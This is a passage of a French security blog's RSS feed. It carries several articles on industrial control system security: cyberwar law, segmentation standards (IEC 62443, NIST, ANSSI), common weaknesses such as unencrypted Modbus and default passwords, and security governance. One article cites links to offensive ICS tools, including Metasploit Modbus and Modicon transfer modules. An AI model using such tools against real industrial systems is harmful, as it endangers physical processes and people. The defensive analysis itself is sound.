<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/04/normes-standards-et-reglementations-de-reels-leviers-pour-la-securisation-des-si-industriels/">Normes, standards et réglementations : de réels leviers pour la sécurisation des SI Industriels ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Sommes-nous entrés dans l’ère des cyberguerres ?</title>
		<link>https://www.riskinsight-wavestone.com/2015/04/sommes-nous-entres-dans-lere-des-cyberguerres/</link>
		
		<dc:creator><![CDATA[Felix.d@hlab]]></dc:creator>
		<pubDate>Fri, 03 Apr 2015 17:21:24 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[Cyberattaque]]></category>
		<category><![CDATA[incident response CERT-W]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=7591</guid>

					<description><![CDATA[<p>C’est une réalité : depuis le début du XXIème siècle, le cyberespace est devenu le théâtre d’intenses affrontements virtuels. La Chine et la Russie sont suspectées de dérober régulièrement des secrets industriels et militaires en Europe et aux États-Unis, alors...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/04/sommes-nous-entres-dans-lere-des-cyberguerres/">Sommes-nous entrés dans l’ère des cyberguerres ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>C’est une réalité : depuis le début du XXIème siècle, le cyberespace est devenu le théâtre d’intenses affrontements virtuels. La Chine et la Russie sont suspectées de dérober régulièrement des secrets industriels et militaires en Europe et aux États-Unis, alors que ces derniers espionnent la planète entière, y-compris parfois leurs propres alliés.</em><br />
<em>Serions-nous donc entrés dans l’ère des cyberguerres ? Ce terme souvent exagéré est de plus en plus employé par les médias. Mais correspond-il vraiment à la réalité d’aujourd’hui ?</em></p>
<h2>Indubitablement, nous sommes entrés dans l’ère des cyberconflits</h2>
<p>Les incidents cyber ont beaucoup occupé l’espace médiatique ces dernières semaines.<br />
Le <a href="http://pro.01net.com/editorial/634154/comment-limiter-les-risques-lors-d-une-attaque-comme-celle-subie-par-sony-face-aux-attaques-comme-celle-qu-a-subi-sony-cette-semaine-la-communaute-de-la-cybersecurite-a-parfois-le-sentiment-d-etre-desarme-explique-gerome-billois-manager-securit/" target="_blank" rel="noopener noreferrer">piratage de Sony</a> a pour sa part marqué un tournant dans la portée des attaques informatiques. Celui-ci a détruit la quasi-totalité du système d’information de l’entreprise et a contraint ses employés à revenir au papier et au crayon pour travailler. Une vaste partie des données internes de l’entreprise a également été mise en pâture sur Internet. Jusqu’alors, le but de telles attaques était généralement de dérober des capitaux ou des secrets industriels. Mais dans ce cas, l’objectif était clairement de mettre l’entreprise à genoux. L’affaire a d’ailleurs pris un tournant politique, les États-Unis ayant ouvertement accusé la Corée du Nord de l’attaque.</p>
<p>Les conflits cyber entre États sont largement répandus aujourd’hui. En 2007, des sites du gouvernement, de banques, médias et opérateurs téléphoniques estoniens ont été victimes d’attaques par déni de service. La Russie est fortement soupçonnée d’être à l’origine de ces offensives ayant paralysé le pays. En 2013, ce sont les systèmes d’information de banques et de chaînes de télévision sud coréennes qui ont été bloqués par des attaques émanant de Corée du Nord. Plus récemment, l’opération djihadiste #OpFrance, qui visait à défacer un maximum de sites français, a montré à tous que désormais les conflits se propagent également dans le monde virtuel.</p>
<p>Pour le département de la Défense des États-Unis mais aussi pour le Ministère de Défense en France, le cyberespace est d’ailleurs devenu un cinquième domaine d’intervention, après l’air, la terre, la mer et l’espace. L’espace cyber est donc clairement devenu un terrain de luttes permanentes…mais ces affrontements peuvent-ils être considérés comme des actes de guerre ?</p>
<h2>Qu’est-ce que la cyberguerre ?</h2>
<p>L’importance d’une définition précise du terme de « cyberguerre » n’est pas uniquement d’ordre linguistique. Derrière cette notion se cache un ensemble de questions juridiques et diplomatiques complexes. L’état de guerre impose en effet l’application de régimes légaux et de règles de rapports mutuels entre États bien spécifiques. Dans le cas de l’attaque contre Sony, Barack Obama a fait redescendre la tension en précisant qu’il ne s’agissait pas d’un acte cyberguerre mais plutôt de « cybervandalisme ». Et cette nuance n’est pas dénuée d’importance : en cas de guerre avérée, les clauses des contrats d’assurance auraient empêché toute indemnisation de l’entreprise !</p>
<p>La question de la contre-attaque se pose également : à partir de quand est-elle autorisée, et quelles formes peut-elle prendre ? Quels objectifs peuvent légitimement être visés par des cyberattaques ? Ce sont précisément les questions auxquelles a tenté de répondre en 2012 le Centre d’excellence de cyberdéfense coopérative de l’OTAN (CCDCOE) de Tallin, en <a href="http://www.lemondeinformatique.fr/actualites/lire-un-think-tank-estonien-publie-un-manuel-juridique-sur-la-cyberguerre-50278.html" target="_blank" rel="noopener noreferrer">publiant un manuel juridique de cyberguerre</a>. La position défendue est que de manière générale, le Droit des conflits armés établi lors des conventions de La Haye et de Genève s’étend au monde cyber.</p>
<p>Une attaque informatique pourrait donc constituer un acte de guerre si ses conséquences sont comparables à celles d’un conflit armé traditionnel, c’est-à-dire si son but est de « <em>de blesser ou tuer des personnes, ou d’endommager ou détruire des objets</em> ». Cela signifie qu’une cyberattaque serait un acte de guerre à partir du moment où elle a des répercussions directes sur le monde physique.</p>
<p>Et c’est précisément le cas des attaques contre les systèmes d’information industriels, qui pilotent les systèmes de production de grands groupes manufacturiers, ou des infrastructures telles que des réseaux électriques ou des barrages. De telles agressions pourraient avoir un lourd coût humain et environnemental, et c’est pourquoi les États imposent souvent des mesures de sécurité strictes à leurs Opérateurs d’Importance Vitale (OIV) ou aux sites dangereux classés Seveso. En France, les travaux en cours sur la <a href="http://www.senat.fr/dossier-legislatif/pjl12-822.html" target="_blank" rel="noopener noreferrer">Loi de Programmation Militaire</a> visent à préciser ces exigences. Le manuel entend également fixer des limites éthiques à la cyberguerre. Il préconise par exemple l’interdiction d’attaquer des hôpitaux ou des centrales nucléaires.</p>
<h2>Attaques de SI industriels</h2>
<p>Les rédacteurs du manuel de Tallinn estiment qu’« aucun incident n’a été de façon claire et publique caractérisé par la communauté internationale comme ayant atteint le seuil d’une agression armée ». Pourtant, les attaques contre les <a title="Niveau de sécurité des SI Industriels : les vulnérabilités les plus courantes" href="http://www.solucominsight.fr/2015/01/niveau-de-securite-des-si-industriels-les-vulnerabilites-les-plus-courantes/" target="_blank" rel="noopener noreferrer">systèmes d’information industriels</a> sont aujourd’hui une réalité. En 2013 par exemple, des pirates se sont introduits sur le réseau de production d’une aciérie allemande et ont détruit plusieurs équipements en arrêtant les hauts fourneaux de façon inopinée.</p>
<p>Mais c’est sans conteste l’infection de systèmes de contrôle de turbines et de centrifugeuses d’enrichissement en uranium iraniennes par le ver Stuxnet qui ressemble le plus à un acte de cyberguerre. Ce malware d’une complexité inédite aurait été mis au point par Israël et par les États-Unis, et a considérablement retardé le programme nucléaire iranien. Si le CCDCOE ne considère pas cette attaque comme un acte de guerre, les experts sont divisés sur la question et certains considèrent qu’il s’agit d’un recours à la force illégal selon le droit international.<br />
Par ailleurs, les principes de proportionnalité des contre-attaques et de protection des populations civiles préconisés par le droit international sont difficiles à respecter en cas de cyberguerre. Les attaques sont généralement difficiles à confiner : dans le cas de Stuxnet, le ver a été retrouvé en Chine, en Allemagne et en Indonésie.</p>
<p>Certains considèrent qu’une nouvelle législation est à mettre en place pour cadrer les affrontements cyber. Le sommet de l’OTAN au Pays de Galles en 2014 a d’ailleurs fait ressortir des positions différentes de celles défendues dans le guide de Tallinn. Il a été affirmé que «<em> les cyberattaques peuvent atteindre un seuil susceptible de menacer la prospérité, la sécurité et la stabilité des États et de la zone euro-atlantique [et] leur impact sur les sociétés modernes pourrait être tout aussi néfaste que celui d’une attaque conventionnelle</em> ». Comment en effet ne pas parler de guerre dans le cas d’une attaque d’une place financière, qui pourrait provoquer une crise économique aux conséquences catastrophiques ?</p>
<p><em>Ces désaccords montrent à quel point les limites restent floues. Les lois internationales sont généralement dictées par la conduite et par les réactions des États : les véritables règles de la cyberguerre mettront du temps à être établies et risquent d’évoluer avec le temps. Quoi qu’il en soit, nous observons dès à présent que les Systèmes d’Information d’importance vitale seront des cibles privilégiés de ces conflits nouveaux. La mise en œuvre de stratégies de cyberdéfense apparaît donc comme un impératif pour les entreprises et les États, qui ne doivent pas attendre la survenue d’une véritable cyberguerre pour se protéger.</em></p>
<p>&nbsp;</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/04/sommes-nous-entres-dans-lere-des-cyberguerres/">Sommes-nous entrés dans l’ère des cyberguerres ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Architecture de sécurité des SI Industriels : de la théorie à la pratique</title>
		<link>https://www.riskinsight-wavestone.com/2015/01/architecture-de-securite-des-si-industriels-de-la-theorie-la-pratique/</link>
		
		<dc:creator><![CDATA[Anthony di Prima]]></dc:creator>
		<pubDate>Fri, 30 Jan 2015 07:50:11 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=7024</guid>

					<description><![CDATA[<p>Les architectures des SI Industriels s’alignent souvent sur le modèle ISA 95. Si cet alignement est surtout motivé par le besoin d’optimiser en continu les procédés industriels, il n’est pas sans risque du point de vue de la sécurité. Alors...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/01/architecture-de-securite-des-si-industriels-de-la-theorie-la-pratique/">Architecture de sécurité des SI Industriels : de la théorie à la pratique</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Les architectures des SI Industriels s’alignent souvent sur le modèle ISA 95. Si cet alignement est surtout motivé par le besoin d’optimiser en continu les procédés industriels, il n’est pas sans risque du point de vue de la sécurité. Alors que les installations industrielles doivent faire face à de nombreux risques, en particulier humains et environnementaux, orchestrer leur ouverture au SI de l’entreprise voire à internet les expose à des menaces plus nombreuses et virulentes.</p>
<h2>Cloisonnement et segmentation : standards et réglementations se mettent d’accord</h2>
<p>Pour traiter ces risques, trois méthodologies issues de l’IEC 62443, du NIST SP-800-82 et du guide de l’ANSSI, sont usuellement retenues.</p>
<p>L’IEC 62443 (ISA99) a établi les concepts de « zones » et de « conduits » avec pour chacun un niveau de sécurité (Security Level – SL) et des règles bien spécifiques. Le découpage en zones peut s’établir d’un point de vue physique (bâtiment, atelier) ou logique (répartition par processus industriel ou par fonction).</p>
<p>Toutes les zones communiquent entres elles par un conduit et peuvent également être imbriquées, dans une logique de défense en profondeur. Selon le niveau de criticité des zones et des conduits, des règles de sécurité sont définies et peuvent être plus ou moins restrictives. La détermination du niveau de sécurité d’une zone (ou d’un conduit) s’effectue au travers d’une analyse de risque. Concrètement, il correspond au niveau de robustesse des mesures de sécurité à implémenter permettant de faire face à des menaces plus ou moins évoluées. Pour l’IEC, il s’agira de segmenter et d’isoler physiquement les SI Industriels des SI de gestion et aussi de cloisonner les systèmes critiques (systèmes de sûreté) des systèmes de conduite des procédés.</p>
<p>Le NIST, au travers de sa publication spé- ciale pour les systèmes industriels, expose de bonnes pratiques d’architectures sécurisées sans promouvoir un modèle en particulier. Il consacre un chapitre entier au thème de la sécurisation des architectures des SI Industriels. Il met en avant le cloisonnement entre SI de gestion et SI Industriels en proposant des architectures type à base de DMZ, de firewall voire de diode. De bonnes pratiques et une matrice de flux type sont même proposées avec un focus pour des flux plus spécifiques.</p>
<p>En France, l’ANSSI prévoit de catégoriser les SI Industriels en 3 classes distinctes selon leur criticité. Trois niveaux sont définis ; la détermination du niveau pour une installation s’effectue au travers de critères tels que connectivité, fonctionnalités, niveau d’exposition, attractivité pour un attaquant, vraisemblance et impacts en cas d’attaque. Pour chacune des classes, des règles plus ou moins strictes font émerger entre autres des principes forts d’architectures sécurisées. Cette démarche peut être itérative. Il est possible de découper l’installation industrielle en plusieurs zones et d’établir pour chacune d’elles son niveau de classe. Cela rejoint l’approche de l’IEC 62443 au détail près qu’ici, la méthodologie de l’ANSSI établit les niveaux de classe en priorité au regard des impacts pour la population, l’environnement et l’économie nationale sans se soucier de l’impact direct pour l’entreprise concernée.</p>
<p>Quelle que soit la méthodologie mise en œuvre, le constat final reste le même : segmentation et cloisonnement constituent des briques essentielles en vue de protéger les SI Industriels. Mais l’expérience montre que segmenter et cloisonner n’est pas toujours simple…</p>
<h2>Besoin métier et sécurité : la quadrature du cercle ?</h2>
<p>Dans bien des cas, on observe un besoin élevé de remonter vers le SI de gestion des données « procédé » en vue de les analyser. Et ce pour différentes raisons : calcul d’optimisation, calcul financier, supply chain, Big data…</p>
<p>Selon la méthode de l’ANSSI, une installation de classe 3 ne peut communiquer avec le SI de gestion que de façon unidirectionnelle via l’utilisation d’une diode. Mettre en œuvre ce genre de technologie peut parfois relever de l’impossible : impossibilité d’avoir du temps réel, incompatibilité des solutions d’historisation des données procédé… Dans ce cas, on découpera l’installation en sous-systèmes de façon à pouvoir lui attribuer différents niveaux de classe. Un sous-système de classe 2 peut communiquer de façon bidirectionnelle avec le SI de gestion, tandis que le sous-système le plus critique de classe 3 n’est autorisé à communiquer unidirectionnellement qu’avec ce sous-système de classe 2. Cette approche peut notamment être considérée pour les systèmes de sûreté.</p>
<p>Si dans certains cas cela peut sembler réaliste, c’est parfois beaucoup plus complexe. L’exemple d’installations s’appuyant sur des SNCC (Système Numérique de Contrôle Commande) montre que les systèmes de sûreté, ou Systèmes instrumentés de sécurité (SIS), peuvent être totalement imbriqués avec les systèmes de conduite : mutualisation des capteurs pour les automates de conduite et de sûreté, automates assurant à la fois des fonctions de conduite et de sûreté.</p>
<h2>Deux solutions opposées sont possibles</h2>
<p>Deux solutions extrêmes sont peut-être à envisager. La première consisterait à revoir un certain nombre de process supports associés au procédé industriel pour permettre un cloisonnement fort des SI Industriels vis-à-vis des SI de gestion. La deuxième serait de revenir à des solutions « moins connectées » : désimbrication totale du SIS, dédoublement des capteurs, automates / contrôleurs de sûreté dédiés et isolés, recours à la logique « câblée », automates et contrôleurs non « modifiables ». Ces deux solutions peuvent sonner comme un retour en arrière. Le meilleur compromis réside sans doute dans une approche plus souple, fondée sur le bon sens et une gestion réaliste du risque.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/01/architecture-de-securite-des-si-industriels-de-la-theorie-la-pratique/">Architecture de sécurité des SI Industriels : de la théorie à la pratique</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Niveau de sécurité des SI Industriels : les vulnérabilités les plus courantes</title>
		<link>https://www.riskinsight-wavestone.com/2015/01/niveau-de-securite-des-si-industriels-les-vulnerabilites-les-plus-courantes/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Fri, 16 Jan 2015 08:04:04 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[SI industriel]]></category>
		<category><![CDATA[vulnérabilités]]></category>
		<guid isPermaLink="false">http://www.solucom-insight.fr/?p=6896</guid>

					<description><![CDATA[<p>Le niveau de sécurité actuel des SI Industriels est souvent remis en question par les spécialistes en sécurité. Alors, cri au loup ou réalité encore méconnue ? Les audits et études réalisés par Solucom ne font que confirmer les défauts...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/01/niveau-de-securite-des-si-industriels-les-vulnerabilites-les-plus-courantes/">Niveau de sécurité des SI Industriels : les vulnérabilités les plus courantes</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Le niveau de sécurité actuel des SI Industriels est souvent remis en question par les spécialistes en sécurité. Alors, cri au loup ou réalité encore méconnue ? Les audits et études réalisés par Solucom ne font que confirmer les défauts de sécurité sur ces infrastructures.</p>
<h2>Une sécurisation insuffisante, voire inexistante</h2>
<p>Les automates programmables industriels (API), en charge de l’interface avec le monde physique, n’intègrent souvent que peu de fonctions de sécurité et les failles de sécurité publiques les concernant sont nombreuses. L’ICS-CERT a ainsi publié près d’une centaine de bulletins de vulnérabilités sur des composants industriels. Les protocoles de communication utilisés sont un des maillons faibles de la chaîne. Ces protocoles, parmi lesquels on peut citer Modbus, permettent l’échange de consignes ou de valeurs en clair, sans chiffrement.</p>
<p>De même, les possibilités d’authentification des actions sont souvent limitées, permettant à n’importe quel attaquant ayant accès au réseau de modifier les consignes des automates et ainsi d’influer sur leur comportement. Les interfaces d’administration des automates sont par ailleurs souvent protégées par des mots de passe par défaut, jamais changés, et qui parfois ne peuvent pas l’être. Les systèmes plus intégrés appelés SNCC (Systèmes Numériques de Contrôle-Commande) ne sont pas garants d’une sécurité accrue, les protocoles propriétaires utilisés n’apportant pas forcément une réelle couche de sécurité.</p>
<p>La situation est identique pour les PC de supervision ou de programmation qui sont souvent des équipements reposant sur des technologies standard, tels que des systèmes d’exploitation Microsoft Windows. Malheureusement, l’expérience sécurité acquise sur le SI de gestion pour ces équipements profite rarement à leur sécurisation sur la partie industrielle. Les étapes de durcissement sécurité sont rares, de même que l’application de correctifs de sécurité, ou encore la présence d’un antivirus. Il est fréquent de pouvoir prendre le contrôle de ces systèmes par l’exploitation d’une faille de sécurité datant de près de 6 ans.</p>
<h2>Un cloisonnement tout à fait relatif</h2>
<p>De plus, les équipements du SI Industriel sont très largement interfacés avec les SI de gestion. Le cloisonnement entre ces deux mondes est souvent permissif. Il arrive même que le filtrage autorise l’accès à certains équipements industriels depuis l’ensemble du réseau interne d’une entreprise, ce qui peut représenter plusieurs dizaines de milliers de machines.<br />
Les postes de programmation et clés USB constituent également des vecteurs d’attaques puisqu’ils sont connectés à des réseaux de niveau de sécurité hétérogène, voire à des environnements non-maîtrisés (par exemple dans le cas de sous-traitants).</p>
<p>Pire encore, il arrive trop souvent que des équipements industriels soient accessibles directement sur internet. Il existe même des moteurs de recherche dédiés à la recherche d’équipements exposés sur internet, Shodan étant le plus connu. Près de 1500 équipements Modbus sont ainsi recensés en France sur Shodan et plus de 20 000 dans le monde.</p>
<h2>Un constat d’échec ?</h2>
<p>Il ne s’agit néanmoins pas de se lamenter. Bien que le niveau de sécurité actuellement constaté soit faible, il est possible de mener des actions d’amélioration. Au-delà des concepts d’architecture qui permettent de cloisonner ces équipements vulnérables, la vraie, seule solution à long terme consiste à développer de nouveaux produits, sécurisés by design. Bien sûr, les fruits de ce travail ne se verront que sur les nouvelles installations, et pas avant plusieurs dizaines d’années. On peut espérer que la prise de conscience globale des parties prenantes, ainsi que l’implication des instances gouvernementales accélèrent ce changement.<br />
En attendant il semble aujourd’hui nécessaire de déporter les fonctions sécurité sur des équipements dédiés, comme des passerelles encapsulant le trafic réseau dans un tunnel chiffré, ou bien des pare-feu ou IPS disposant de modules spécifiques aux protocoles industriels.</p>
<p>Enfin, il faut également savoir tirer parti d’une des faiblesses des SI Industriels : leur durée de vie et la complexité de changements. En effet, la mise en place d’une supervision sécurité sera facilitée par le caractère figé des réseaux industriels : il est rare que de nouveaux équipements soient installés ou que la topologie réseau soit modifiée. De même, l’emploi d’une solution de contrôle d’exécution par liste blanche sera plus facile sur un PC industriel n’exécutant qu’un seul logiciel de supervision que sur un poste de travail bureautique.</p>
<figure id="post-6898 media-6898" class="align-none"><img loading="lazy" decoding="async" class="" src="http://www.solucom-insight.fr/wp-content/uploads/2015/01/Capture.jpg" alt="" width="508" height="246" /></figure>
<figure id="post-6898 media-6898" class="align-none"></figure>
<p><span style="font-size: x-small;">1 &#8211; http://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient </span><br />
<span style="font-size: x-small;">2 &#8211; https://github.com/arnaudsoullie/metasploit-framework/blob/modicon_stux_transfer/modules/auxiliary/admin/scada/modicon_stux_transfer.rb<br />
</span><span style="font-size: x-small;">3 &#8211; https://github.com/arnaudsoullie/scan7</span></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/01/niveau-de-securite-des-si-industriels-les-vulnerabilites-les-plus-courantes/">Niveau de sécurité des SI Industriels : les vulnérabilités les plus courantes</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>SI industriel et sécurité : oser la transformation (partie 2)</title>
		<link>https://www.riskinsight-wavestone.com/2014/04/industriel-securite-oser-transformation-partie-2/</link>
		
		<dc:creator><![CDATA[Anthony di Prima]]></dc:creator>
		<pubDate>Thu, 10 Apr 2014 19:29:39 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=5318</guid>

					<description><![CDATA[<p>Comment nous l&#8217;avons vu dans un précédent article, les SI industriels comportent des spécificités indispensables à prendre en compte avant de démarrer une démarche de sécurisation. Initier la démarche de sécurisation Avant d’entreprendre de grands chantiers de sécurité, il est...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/04/industriel-securite-oser-transformation-partie-2/">SI industriel et sécurité : oser la transformation (partie 2)</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Comment nous l&rsquo;avons vu dans un précédent article, les SI industriels comportent des spécificités indispensables à prendre en compte avant de démarrer une démarche de sécurisation.</p>
<h2>Initier la démarche de sécurisation</h2>
<p dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="182.8572562408447">Avant d’entreprendre de grands chantiers de sécurité, il est important de savoir d’où l’on part. Le SII est-il vulnérable ? Dans quelle mesure est-il ouvert sur l’extérieur ? Quel est son véritable niveau d’exposition face aux nouvelles menaces ?</p>
<p dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="223.24004139804833">Trois approches différentes permettent de répondre à ces questions. L’audit « flash » sur les sites les plus sensibles ou ayant connu un incident récent, permet d’identifier rapidement les vulnérabilités et les zones non protégées. L’analyse de risques d’un processus industriel permet de son côté d’estimer les impacts financiers, humains et environnementaux en cas d’incident. Un bilan de conformité consiste quant à lui à demander à chaque site industriel d’évaluer son niveau de sécurité sur la base d’un questionnaire. Si cette dernière approche est moins concrète et fiable, elle permet d’avoir une vision globale plus rapidement. Il n’y a pas de chemin type : les trois approches peuvent être utilisées ou combinées. Elles doivent aussi être l’occasion de mobiliser la direction générale et les directions métiers dont l’engagement et l’implication dans la durée sont nécessaires.</p>
<h2 dir="ltr" data-angle="0" data-font-name="g_font_144_0" data-canvas-width="91.37205402374268">Mettre en place une filière sécurité des SI industriels</h2>
<p dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="68.10209737586976">La mise en place d’une gouvernance globale de la sécurité des SII est essentielle pour augmenter le niveau de sécurité dans la durée. Cela passe par la nomination d’un Responsable de la sécurité des SII chargé de la définir, de la mettre en œuvre et de l’animer. Qu’il vienne du Métier, du monde de la DSI, de la sécurité SI ou du monde industriel (automatisme, sûreté, etc.), il doit être capable de jouer le rôle de facilitateur entre ces différentes sphères. La connaissance du métier industriel et les qualités humaines sont donc à privilégier lors de son identification plutôt qu’une expertise en sécurité. Son rattachement peut être à étudier en fonction du contexte de l’entreprise : s’il est courant qu’il fasse partie des équipes sécurité SI, il est parfois directement rattaché aux Métiers concernés.</p>
<p dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="258.5978900356293">Le Responsable de la sécurité des SII pourra s’appuyer sur un réseau de correspondants qui se feront le relais de la stratégie et des actions sur les différents sites industriels. Il développera également des relations étroites avec des acteurs incontournables du SII :</p>
<div dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="238.9612494039536">
<ul>
<li>les chefs de projets industriels, avec lesquels il faudra s’assurer que la sécurité est prise en compte dès la conception ;</li>
<li>les responsables de la sûreté, avec lesquels il mettra en œuvre une démarche commune de gestion des risques industriels ;</li>
<li>les responsables de l’exploitation et la maintenance, pour s’assurer de la bonne exécution des processus de maintien en condition opérationnelle et de sécurité du SII ;</li>
<li>
<div dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="248.28515106582645">les responsables des achats, pour diffuser les bonnes pratiques en matière des exigences de sécurité dans toutes relations avec les tiers et dans les contrats avec les fournisseurs ;</div>
</li>
<li>
<div dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="56.47454782390595">la DSI et le RSSI pour s’interfacer avec le SI classique et capitaliser sur les bonnes pratiques.</div>
</li>
</ul>
</div>
<h2 dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="238.9612494039536">Intégrer la sécurité dès la conception</h2>
<div dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="238.9612494039536">
<p>Concevoir une usine, un site industriel ou un équipement embarqué s’accompagne la plupart du temps d’études de sûreté. Il faut tirer partide cette culture déjà bien ancrée pour y insérer les études de sécurité du SI Industriel qui seront centrées sur les risques de cybersécurité.</p>
<p dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="147.41594431972504">Attention toutefois à rester vigilant et ne pas se focaliser uniquement sur le procédé industriel lui-même. L’environnement proche ou éloigné du SII est également à étudier pour chaque projet : dans quelles conditions les interventions de tiers pour la télégestion et la télémaintenance seront  réalisées ? Le fournisseur s’applique-t-il lui-même des exigences de sécurité lorsqu’il développe les solutions industrielles ?</p>
<h2 dir="ltr" data-angle="0" data-font-name="g_font_144_0" data-canvas-width="191.07743341445925">Traiter les urgences sans négliger la sécurisation à moyen terme</h2>
<p dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="120.24044536685943">Les particularités des SII poussent souvent les entreprises à allier des solutions palliatives à court terme, et à saisir l’opportunité de faire des modifications en profondeur quand elle se présente : arrêt de production, renouvellement de l’outil industriel, changement de fournisseur, etc.</p>
<p dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="278.3936107158661">C’est particulièrement vrai pour la mise en œuvre du cloisonnement et de la segmentation des réseaux : si on peut isoler le SI de gestion, les changements sur les réseaux de production sont plus complexes à organiser !</p>
<p dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="278.4968892688751">La refonte des accès distants est également à intégrer dans cette réflexion. Elle nécessite de revoir les contrats établis sur plusieurs années, dont la renégociation des modalités d’intervention, de télégestion et de télémaintenance est peu fréquente. En parallèle, une fois les vulnérabilités sur le système identifiées, il faut être en capacité de les corriger.</p>
<p dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="234.27359097290037">Appliquer les correctifs n’est parfois pas envisageable et remplacer les équipements par d’autres plus récents offrant les dernières fonctions de sécurité présente un coût non négligeable, tant en termes financiers qu’en perte d’exploitation potentielle sur des systèmes où la disponibilité est cruciale.</p>
<div dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="234.27359097290037">
<p dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="207.98909198570246">Conscient des vulnérabilités des SII, il est crucial de mettre en place sur l’installation industrielle des dispositifs de surveillance afin de détecter et de réagir face aux incidents. L’intégration du SII au SOC ou au CERT de l’entreprise peut être envisagée dans une stratégie de réaction globale.</p>
<div dir="ltr" data-angle="0" data-font-name="g_font_138_0" data-canvas-width="278.47712938499456">La mise en œuvre de la sécurité pour les SI industriels ne pourra se faire qu’en s’accommodant des spécificités et des contextes particuliers dans lesquels ils évoluent. Mobiliser les directions métiers et combiner les savoir-faire issus du monde industriel et de gestion sont assurément des facteurs clé de succès. En parallèle, les fonctions de responsable de la sécurité du SI de gestion et de responsable de la sécurité du SI Industriel doivent s’associer, voire fusionner, pour assurer la cohérence de la démarche de sécurisation de l’entreprise de bout en bout dans une approche globale.</div>
</div>
</div>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/04/industriel-securite-oser-transformation-partie-2/">SI industriel et sécurité : oser la transformation (partie 2)</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>SI industriel et sécurité : oser la transformation  (partie 1)</title>
		<link>https://www.riskinsight-wavestone.com/2014/03/si-industriel-et-securite-oser-la-transformation-partie-1/</link>
		
		<dc:creator><![CDATA[Anthony di Prima]]></dc:creator>
		<pubDate>Mon, 03 Mar 2014 07:29:21 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[SCADA]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=5175</guid>

					<description><![CDATA[<p>La sécurité des Systèmes d’Informations Industriels (SII) est aujourd’hui au centre des préoccupations dans les entreprises concernées. Ces systèmes qui permettent une action directe dans le monde «physique» à l’aide d’instructions provenant du monde « logique» pilotent les outils de...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/03/si-industriel-et-securite-oser-la-transformation-partie-1/">SI industriel et sécurité : oser la transformation  (partie 1)</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
